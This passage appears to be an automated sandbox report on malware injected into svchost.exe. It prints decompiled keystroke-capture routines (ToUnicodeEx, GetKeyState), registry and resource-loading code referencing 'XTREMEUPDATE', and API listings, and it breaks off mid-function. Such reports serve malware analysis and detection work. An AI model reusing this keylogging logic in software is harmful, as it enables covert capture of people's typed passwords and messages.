RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Strings

FakeMessage, xrefs: 00C8986C
SOFTWARE\FakeMessage, xrefs: 00C8984B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83D8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26
library

C-Code - Quality: 37%

			E00C83D8C() {
				struct HINSTANCE__* _v8;
				intOrPtr _t14;
				intOrPtr _t17;

				_v8 = LoadLibraryA("kernel32.dll");
				_push(_t17);
				_push(0xc83dd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t17;
				 *0xc8c698 = GetProcAddress(_v8, "IsWow64Process");
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(E00C83DDC);
				return FreeLibrary(_v8);
			}

0x00c83d9a
0x00c83d9f
0x00c83da0
0x00c83da5
0x00c83da8
0x00c83db9
0x00c83dc0
0x00c83dc3
0x00c83dc6
0x00c83dd4

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C83D95
GetProcAddress.KERNEL32(?,IsWow64Process,00000000,00C83DD5,?,?,?,00C83EE9), ref: 00C83DB4
FreeLibrary.KERNEL32(?,00C83DDC,00C83DD5,?,?,?,00C83EE9), ref: 00C83DCF

Strings

IsWow64Process, xrefs: 00C83DAB
kernel32.dll, xrefs: 00C83D90

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83E00, Relevance: 7.6, APIs: 5, Instructions: 60

APIs

GetCurrentProcess.KERNEL32(?,00C91F1C), ref: 00C83E1E
IsWow64Process.KERNEL32(00000000,?,00C91F1C), ref: 00C83E24
OpenProcess.KERNEL32(00000400,00000000,00000E60), ref: 00C83E46
IsWow64Process.KERNEL32(?,?,00000000,00C83E98,?,00000400,00000000,00000E60), ref: 00C83E6A
CloseHandle.KERNEL32(?), ref: 00C83E92

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83FDC, Relevance: 7.5, APIs: 5, Instructions: 37

C-Code - Quality: 100%

			E00C83FDC(WCHAR* __eax, void* __edx) {
				WCHAR* _t2;
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t7;
				void* _t9;
				struct HRSRC__* _t13;
				void* _t14;
				void* _t19;

				_t2 = __eax;
				_t19 = __edx;
				if(__eax == 0) {
					_t2 =  *0xc8b0b0; // 0xc83fcc
				}
				_t3 =  *0xc8c670; // 0xc80000
				_t13 = FindResourceW(_t3, _t2, 0xa);
				_t5 =  *0xc8c670; // 0xc80000
				SizeofResource(_t5, _t13);
				_t7 =  *0xc8c670; // 0xc80000
				_t14 = LoadResource(_t7, _t13);
				_t9 = LockResource(_t14);
				if(_t9 != 0) {
					E00C82914(_t19, _t9);
					return FreeResource(_t14);
				}
				return _t9;
			}

0x00c83fdc
0x00c83fdf
0x00c83fe3
0x00c83fe5
0x00c83fe5
0x00c83fed
0x00c83ff8
0x00c83ffb
0x00c84001
0x00c84009
0x00c84014
0x00c84017
0x00c8401e
0x00c84025
0x00000000
0x00c8402b
0x00c84033

APIs

FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85928(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860c0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858D3, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858D3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86098);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85906, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85906(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860b0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C859F4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859F4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc861a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858E4, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858E4(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc860a0);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858B1, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858B1(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, 0xc86088);
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
